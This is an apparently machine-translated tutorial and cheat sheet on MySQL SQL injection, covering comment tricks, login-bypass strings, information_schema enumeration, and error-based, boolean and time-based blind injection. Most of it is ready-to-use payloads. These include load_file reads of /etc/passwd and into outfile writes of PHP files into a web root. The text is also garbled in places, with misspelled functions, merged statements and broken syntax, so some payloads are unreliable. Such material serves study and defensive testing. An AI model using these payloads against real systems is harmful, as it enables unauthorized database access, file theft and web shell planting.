Basic knowledge of SQL injection and basic knowledge of SQL Injection

Basic knowledge of SQL injection and basic knowledge of SQL Injection

What is SQL Injection)

The so-called SQL injection attack means that an attacker inserts an SQL command into the input field of a Web form or the query string requested by the page, and deceives the server to execute malicious SQL commands. In some forms, the content entered by users is directly used to construct (or affect) dynamic SQL commands or as input parameters of stored procedures. Such forms are particularly vulnerable to SQL injection attacks.

Mysql comments

#

-- [Space] Or -- +

/*... */

During attention, these annotations may all require urlencode.

Mysql Authentication Bypass

; % 00

'Or 1 = 1 #

'/*! Or */1 = 1 -- +

Mysql Connector

Use + to connect to mysql.

select * from users where username='zhangsan' and "ab"="a"+"b";

Common functions in mysql

Mysql built-in functions are used during SQL injection. Built-in functions include functions to obtain information and function functions.

The information function is used to obtain information about the mysql database. The function is a traditional function used to complete an operation.

Common Information functions include:

database() Used to obtain information about the currently used database

version():Returns the database version, which is equivalent@@version

user()：Returns the current user, which is equivalent to the current_user parameter. For example:

select user(); #root@localhostselect current_user; #root@localhost

@@datadirTo obtain the storage location of the database.

select @@datadir; #D:\xampp\mysql\data\

Common functions include:

load_file():Load files from the computer and read the data in the files.

Select * from users union select 1, load_file ('/etc/passwd'), 3; select * from users union select 1, load_file (0x2F6574632F706173737764), 3; # Use hexadecimal notation to bypass single quotes

into outfile：Write files only if you have the write permission.

select '<?php phpinfo(); ?>' into outfile '/var/www/html/xxx.php';select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/xxx.php';

concat():Returns the string generated by the connection parameter. If one of the parameters is null, the return value is null.

The usage is as follows:

select concat(username,password)from users;

*concat_ws(): Yesconcat_ws()The first parameter is the delimiter, and the remaining parameter is the field name.

select concat_ws(',',username,password) from users;

group_concat(): Used to merge results from multiple records.

The usage is as follows:

Select group_concat (username) from users; # All usernames in the users table are returned and returned as a record.

subtring(),substr():Used to truncate a string. Usage:substr(str,pos,length) Note that pos starts from 1.

select substr((select database()),1,1);

ascii():Returns the ascii value of a character.

select ascii('a'); #97

length():Returns the length of a string.

For example:

Select length ("123456") # returns 6

is(exp1,exp2,exp2):If the exp1 expression is True, exp2 is returned; otherwise, exp3 is returned.

For example:

select 1,2,if(1=1,3,-1) #1,2,3selecrt 1,2,if(1=2,3,-1) #1,2,-1

The preceding functions are commonly used in SQL injection projects. Of course, some functions are not used.

now():Returns the current system time.

hex():Returns the hexadecimal string.

unhex():Hex () in hexadecimal notation

@@basedir():Reverse mysql installation directory

@@versin_compile_os:Operating System

Mysql database metadata

Exist in mysqlinformation_schemaIt is an information database that stores information about all other databases stored by the Mysql server, such as the database name, database table, and table field name.

And access permissions. Ininforma_schemaCommonly used tables include:

Schemata: Stores all the database information in mysql. The returned results are the same as those of show databases.

Tables: Stores information about tables in the database. Describes in detail the schema, table type, and table engine of a table.

ShowThe result of tables from secuiry is from this table.

Columns: Describes in detail all the columns of a table and the information of each column.

Show columns from usersThe result is from this table.

The following describes how to use the preceding three tables to obtain database information.

Select database (); # query the selected database select schema_name from information_schema.schemata limit # query the database select table_name from information_schema.tables where table_schema = database () limit; # query table select column_name from information_schema.columns where table_name = 'users' limit; # query Columns

SQL Injection Type

The SQL injection types can be roughly divided into conventional SQL injection and SQL blind injection. SQL blind injection can be divided into time-based blind injection and Web Content-Based Blind injection.
There are a lot of instructions on SQL blind injection on the Internet, and I will not explain it too much here. The concept of blind injection can be easily described with specific examples.
In latency injection, common functions are included.if()Andsleep()Function.

The basic SQL expression is as follows:

select * from users where id=1 and if(length(user())=14,sleep(3),1);select * from users where id=1 and if(mid(user(),1,1)='r',sleep(3),1);

Wide byte Injection

For details about width byte injection, refer to width byte injection. The wide-byte input is generally caused by the mismatch between the webpage encoding and the database encoding. For wide byte injection, use % d5 or % df to bypass

Summary of common mysql statements

Regular Injection

1 'order by num # determine the field length 1' union select 1, 2, 3 # determine the field length-1' union select 1, 2, 3 # determine the fields displayed on the page-1 'Union select 1, 2, group_concat (schema_name) from information_schema.schemata # display all databases in mysql-1 'Union select 1, 2 group_concat (table_name) from information_schema.tables where table_schame = "dbname"/database ()/hex (dbname) #-1 'Union select 1, 2, column_name from information_schema.columns where table_name = "table_name" limit #-1 'Union select, group_concat (column_name) from information_schema.columns where table_name = "table_name"/hex (table_name) limit #-1 'Union select, 3 AND '1' = '1 when the annotator cannot be used

Double SQL query and selection

Select concat (0x3a, 0x3a, (select database (), 0x3a, 0x3a); select count (*), concat (0x3a, 0x3a, (select database (), 0x3a, 0x3a, floor (rand () * 2) a from information_schema.tables group by a; select concat (0x3a, 0x3a, (select database (), 0x3a, 0x3a, floor (rand () * 2) a from information_schema.tables; select count (*), concat (0x3a, 0x3a, (select database (), 0x3a, 0x3a, floor (rand () * 2) a from information_schema.tables group A; # This SQL statement is commonly used for SQL blind injection. Obtain the database information such as select count (*), concat (0x3a, 0x3a, (select table_name from information_schema.table where table_schema = database () limi), 0x3a, 0x3a, floor (rand () * 2) a from information_schema.tables group by a; # obtain the information of the database table # use the following posture: 1' AND (select 1 from (select count (*), concat (0x3a, 0x3a, (select table_name from information_schema.table where table_schema = database () limi 0, 1), 0x3a, 0x3a, floor (rand () * 2 )) a from information_schema.tables group by a) B) -- +

This posture is used to obtain the required information through the error message when mysql executes the SQL command. In the following article, we will analyze this method in detail.

Bool blind Injection

1' and ascii(substr(select database(),1,1))>991' and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>90

Bool blind injection is used to obtain information based on the page content corresponding to True or False returned values of SQL statements.

Time blind Injection

1' AND select if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='e',sleep(10),null) +1' AND select if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(10),null) --+

Both of the above two statements are equivalent, and the time blind injection is different from the conventional SQL injection methods. Time blind injection needs to be generally usedif()Andsleep()Function. Then, based on the length of the content returned by the pagesleep()Whether the function is executed.

Accordingsleep()Whether the function is executed to obtain the required information.

Summary

The above is the basic knowledge necessary for SQL injection. The next article will explain the knowledge in SQL Injection in detail through examples. Today's article is also a basic knowledge. If you are interested in SQL injection, please stay tuned to the help house.